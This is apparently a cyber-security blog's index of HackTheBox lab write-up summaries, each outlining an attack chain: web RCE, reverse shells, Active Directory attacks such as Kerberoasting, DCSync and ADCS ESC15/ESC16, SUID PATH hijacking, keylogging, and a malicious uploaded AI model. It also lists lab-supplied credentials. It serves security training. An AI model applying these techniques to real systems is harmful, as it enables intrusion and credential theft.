Nooff's Cyber Blog

Overview Editor is an easy Linux machine from HackTheBox. This box mainly relies on good enumeration and researching skills. Programming knowledge in Bash and C will also help you a lot. We start by enumerating XWiki website and discovering a vulnerability which leads to RCE. After the foothold, we find a config file with credentials, which we use to access the machine via SSH. During priv esc, we find Netdata’s Ndsudo with SUID set. We modify the PATH variable so Ndsudo executes our malicious executable, elevating our privileges to Root.

As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2 Overview Outbound is an easy Linux machine from HackTheBox. This box depends heavily on enumeration and looking for the slightest of information. It also has several cool vulnerabilities. We start with identifying a vulnerable Roundcube Webmail web app, which we exploit and get an initial foothold. We find credentials for MySQL database and discover some auth secrets. Combining all of the found information, we decrypt a password for higher privileged user. During final privilege escalation, we once again find vulnerable software version and use an local priv esc exploit to get root and ultimately pwn the machine.

Overview Artificial is an easy Linux machine from HackTheBox. As the name implies, this box offers us an opportunity to hack AI models and much more. Firstly, we discover a website where we can upload our AI models. We craft a malicious Python AI model with injected shell code, upload it and get a reverse shell on the machine. During priv esc, we find credentials in old backup file for internal Backrest backup service. Abusing Restic’s restore function, we can backup arbitrary files to our local machine and get the root flag. Nmap scan Starting with the Nmap scan. ┌──(root㉿kali)-[/home/kali] └─ # nmap -A 10.10.11.74 -T5 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 20:35 CEST Nmap scan report for artificial.htb (10.10.11.74) Host is up (0.037s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RS...

As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV! Overview TombWatcher is a medium Windows machine from HackTheBox. This is another Active Directory box which allows you to perform a lot of AD attacks, because there is a lot of vulnerabilities. After enumeration, we perform lateral movement, compromising a lot of accounts with attacks like Kerberoasting, abusing different privileges like “ReadGMSAPassword” and “WriteOwner” etc. During priv esc, we restore deleted CA account and find ESC15 vulnerability in ADCS. We exploit it and change Administrator’s password, giving ourselves full control over the machine and domain.

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025! Overview Puppy is a medium Windows machine from HackTheBox. This is Active Directory type of challenge, tackling some of the basic/intermediate cybersecurity skills. We start by discovering Keepass password database on SMB server. After decrypting it, we gain access to other user with “GenericAll” privilege over disabled user. We re-enable this user via LDAP and get another user’s credentials from website backup ZIP file. Next, we abuse DPAPI and get a masterkey from the DC, which we use to decrypt admin user’s credentials. This admin user has “DCSync” privilege over the domain, so we abuse it and dump a hash for Administrator user, compromising the Domain Controller and entire domain.

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990! Overview Fluffy is an easy Windows machine from HackTheBox. This box is an Active Directory challenge, which tackles certificate abuse, Shadow Credentials attack, ADCS attacks etc. We start by discovering a vulnerability report on a SMB share, learning about unpatched bugs. We trick the DC to reach to us and give us the NTLMv2 hash of user “p.agila”. Then, we perform the Shadow Credentials attack (certificate abuse, “msDs-KeyCredentialLink” attribute) on all service accounts we have write access to, including the “ca_svc” account, getting their NT hashes. Next, we use our control over “ca_svc” user and perform certificate template enumeration with “certipy”. We discover the ADCS ESC16 vulnerability, which allows us to trick the CA by modifying our user’s UPN into giving us Administrator’s NT hash, granting us full control over the domain.

As is common in real life pentests, you will start the Planning box with credentials for the following account: “admin” / “0D5oT70Fq13EvB5r”. Overview Planning is an easy Linux machine from HackTheBox. This is a beginner-friendly box, which consists of several simple challenges, but can be tricky at times. Careful enumeration is the key. We start with discovering secret subdomain, which hosts Grafana monitoring system. We exploit a SQL injection, which leads to RCE and we get a shell on Docker container. We find pair of credentials in between environment variables and use them to login into the machine. Next, we find an internal service for managing cronjobs, which we access with other credentials found in cronjob database file. We then add our malicious cronjob and get root shell.

Overview Environment is a medium Linux machine from HackTheBox. This box is mostly about environment variables and contains some rare challenges for intermediate hackers. We start by raising an exception in the Laravel web application, which exposes us to a snippet of backend source code. Next, we exploit the environment manipulation vulnerability via query string in Laravel, changing the environment to “pre-production”, granting us access to admin dashboard. Next, we utilize file upload bypass techniques and get a shell on the machine. Once inside, we compromise another user by decrypting his asymmetrically encrypted PGP backup file, giving us this user’s password list. To get root, we check our sudo permissions configuration and discover a possibility to inject custom Bash script into preserved environment variable “BASH_ENV”. We abuse this functionality and give ourselves a root shell.

Overview Nocturnal is an easy Linux machine from HackTheBox. This box is great for beginners, because it lets you exploit some basic web app vulnerabilities, preparing you for the real world ethical hacking. We start with discovering an IDOR which lets us enumerate usernames on the website. We find file with a password for other user, who has access to the admin panel. Next, we find command injection in backup function, which leads to dumping internal MySQL database. Once inside, we discover an internal service. To access it, we use previously found credentials. After that, we find code execution exploit on the internet and use it to get the root shell.

Overview Code is an easy Linux machine from HackTheBox. This box serves as introduction to Python code exploitation, specifically to bypassing certain restrictions by using other functionality. We start with discovering Python Code Editor web application, which restricts certain keywords which could cause RCE on the server. We find a way to bypass this restriction and get a shell. Inside the machine, we find SQLite database file with hashed password for other user. Lastly, we abuse our write permissions in combination with another restriction bypass techniques to backup the “/root” directory and get the root flag.

Overview Cypher is a medium Linux machine from HackTheBox. This machine plays with very rare vulnerabilities and forces you to enumerate and research more information. The box starts with discovering several Java class files on the website. Upon decompiling them, we discover custom function capable of giving us a reverse shell. Next, we discover a unique vulnerability known as Cypher injection with Neo4j graph database running in the back end. Via this Cypher injection, we call the mentioned function and get a foothold on the machine. Inside, we find credentials for another low-privileged user with sudo permission over Bbot recon scanner. We find out that Bbot has debug capability and we abuse it to read the root flag.

Overview Dog is an easy Linux machine from HackTheBox. This box is a great introduction for beginners to several common and key vulnerabilities in the world of ethical hacking. We start out discovering exposed Git repository on the website with all the source code for it. We find some information about the software which is being used, potential username and a pair of credentials for database. With a technique called “credential stuffing”, we log in with a user we found earlier and get access to a Backdrop CMS dashboard. We search up and find authenticated RCE exploit abusing the installation of custom modules. That is how we get the initial foothold on the machine. After that, we login as another user using the same password we used earlier and discover we can run Backdrop’s binary “bee” with elevated privileges. We abuse built-in function “eval” to run arbitrary code as super-user and get a shell as root.

Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.

Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.

Overview Support is an easy Windows machine from HackTheBox. This box is perfect for beginners as it tackles some common vulnerabilities from multiple fields like Windows Active Directories and reverse engineering. Although this box is marked as easy, it can still confuse you like me. We start with discovering an interesting binary on one SMB share. After we reverse engineer the binary with dnSpy, we can find hardcoded encrypted password for one of the users. We XOR the encrypted password with a key and get the cleartext password. Next, we do LDAP search and find another cleartext password for another user. We soon figure out that this user belongs into special group that has full control over Domain Controller. We abuse this permission by creating fake account on the machine and allow DC to act on behalf of other identity.

Overview Lame is an easy Linux machine from HackTheBox. This box is definitely one of the quickest ones on the platform, but it plays with some big and infamous vulnerabilities. We start with discovering multiple services running on open ports. We find out that VsFTPd 2.3.4 is being used, which is known to have a backdoor. We used exploit provided by Metasploit, but it didn’t work. There is a firewall blocking us, as we find out later. After that, we perform additional enumeration on the machine. Eventually, we notice that SMB also uses vulnerable software, and that’s Samba 3.0.20. We use Metasploit’s “Username map” exploit to get a shell on the machine as root. We then get both user flag and root flag.